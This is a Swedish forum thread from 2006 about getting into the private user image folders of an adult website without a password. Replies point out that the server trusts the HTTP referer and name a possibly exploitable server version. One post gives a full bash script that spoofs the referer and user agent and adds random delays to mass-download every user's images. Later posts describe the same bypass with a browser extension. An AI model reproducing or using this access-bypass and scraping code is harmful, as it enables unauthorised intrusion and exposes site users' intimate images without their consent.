Vinnaren i pepparkakshustävlingen!
2006-04-13, 21:44
  #1
Medlem
Jag vet inte om detta vart rätt forum men ja hoppas de. Går det att komma åt bilddatabasen på porrigt.se? Helst utan att behöva knäcka lösenord Adressen ser ut så här http://img.porrigt.se/user/3/****/files/
Citera
2006-04-28, 21:15
  #2
Medlem
Kortisons avatar
Citat:
Ursprungligen postat av PirateHook
Jag vet inte om detta vart rätt forum men ja hoppas de. Går det att komma åt bilddatabasen på porrigt.se? Helst utan att behöva knäcka lösenord Adressen ser ut så här http://img.porrigt.se/user/3/****/files/

Nej det gör det inte och om du provar och du mot all förmodan fixar det så kommer du åtalas
Citera
2006-04-28, 21:49
  #3
Medlem
Går man hit står det
Citat:
You must supply a local referer to get URL '/' from this server.
Så om man kan modifiera sin referer till något servern anser som lokalt kanske man får åtkomst.

Dessutom kör de "Server: thttpd/2.25b 29dec2003" och det är möjligt att det finns någon exploit man kan utnyttja:
http://search.securityfocus.com/swse...c&query=thttpd
Citera
2006-05-04, 22:07
  #4
Medlem
FoxOnes avatar
Citat:
Ursprungligen postat av PirateHook
Jag vet inte om detta vart rätt forum men ja hoppas de. Går det att komma åt bilddatabasen på porrigt.se? Helst utan att behöva knäcka lösenord Adressen ser ut så här http://img.porrigt.se/user/3/****/files/

Det går.. Och var inte särskillt svårt..
Om man anger sin referer till något från http://porrigt.se så blir man snällt och fint insläppt :>

Den som svängde ihop den koden kan inte ha varit särskillt seriös..
(Men men, är väl några tonåringar som driver siten..)

Ett proof-of-concept kan vara:

Kod:
#!/bin/bash
prefix='http://img.porrigt.se'
touch index.html
rm index.html
wget -q -N -erobots=off --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" --referer=http://porrigt.se http://img.porrigt.se/user/
for x in $(grep '<A HREF="/user/' index.html | sed -e 's/.*<A HREF="//' -e 's/">.*//' | grep -v '\.')
do
    touch index.html
    rm index.html
    sleep `expr $RANDOM % 10`
    wget -q -N -erobots=off --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" --referer=http://porrigt.se $prefix$x
    for y in $(grep '<A HREF="/user/' index.html | sed -e 's/.*<A HREF="//' -e 's/">.*//' | grep -v '\.')
    do
        dir=$(echo $y | sed -e 's/\/user\///' | sed -e 's/\//_/')
        if [ ! -f $dir/pr0n.done ]
        then
            mkdir $dir
            cd $dir
            touch index.html
            rm index.html
            sleep `expr $RANDOM % 100`
            wget -q -N -erobots=off --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" --referer=http://porrigt.se $prefix$y"files/"
            for z in $(grep '<A HREF="/user/' index.html | sed -e 's/.*<A HREF="//' -e 's/">.*//' | grep -v '\./' | grep -v thumb)
            do
                sleep `expr $RANDOM % 10`
                wget -q -N -erobots=off --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" --referer=http://porrigt.se $prefix$z
            done
#            echo $prefix$y"files/"
            echo $y
            touch pr0n.done
#            rm index.html
            cd ..
        fi
    done
#    rm index.html
#    echo $prefix$x
done

Inte världens snyggaste men jag får skylla på att det var en del sprit inblandat
Citera
2006-05-04, 23:41
  #5
Medlem
Citat:
Ursprungligen postat av FoxOne
Det går.. Och var inte särskillt svårt..
Om man anger sin referer till något från http://porrigt.se så blir man snällt och fint insläppt :>

Den som svängde ihop den koden kan inte ha varit särskillt seriös..
(Men men, är väl några tonåringar som driver siten..)
Hehe, helsäkert!

Vad har
"touch index.html
rm index.html"
för syfte?
Citera
2006-05-05, 07:45
  #6
Medlem
FoxOnes avatar
Citat:
Ursprungligen postat av JAM_
Hehe, helsäkert!

Vad har
"touch index.html
rm index.html"
för syfte?

För att få scriptet lite tystare i konsollen så var tanken att kolla huruvida index.html finns innan den tas bort..
Citera
2006-05-05, 08:14
  #7
Medlem
Citat:
Ursprungligen postat av FoxOne
Det går.. Och var inte särskillt svårt..
Om man anger sin referer till något från http://porrigt.se så blir man snällt och fint insläppt :>

Jag trodde att det skulle vara något liknande.

Man kan även använda Firefox-tillägget RefControl så kan man bläddra igenom bilderna direkt i webläsaren.
Citera
2006-05-11, 21:11
  #8
Medlem
Exakt vad skulle man skriva in i RefControl?
Citera
2006-05-12, 13:03
  #9
Medlem
Citat:
Ursprungligen postat av Slutgnäll
Exakt vad skulle man skriva in i RefControl?
Ta "add site", lägg till img.porrigt.se med referer http://porrigt.se.
Citera
2006-05-16, 19:05
  #10
Medlem
tomas_s avatar
Citat:
Ursprungligen postat av FoxOne
För att få scriptet lite tystare i konsollen så var tanken att kolla huruvida index.html finns innan den tas bort..
rm -f
Citera
2006-05-17, 16:51
  #11
Medlem
FoxOnes avatar
Citat:
Ursprungligen postat av tomas_
rm -f

Tackar och bockar..
(Där fick man för att man inte konsulterade allsmäktige --help ;)
Citera
2006-05-23, 22:20
  #12
Medlem
Bakas avatar
har de ändrat något nyligen, för det verkar inte fungera längre?
Citera

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback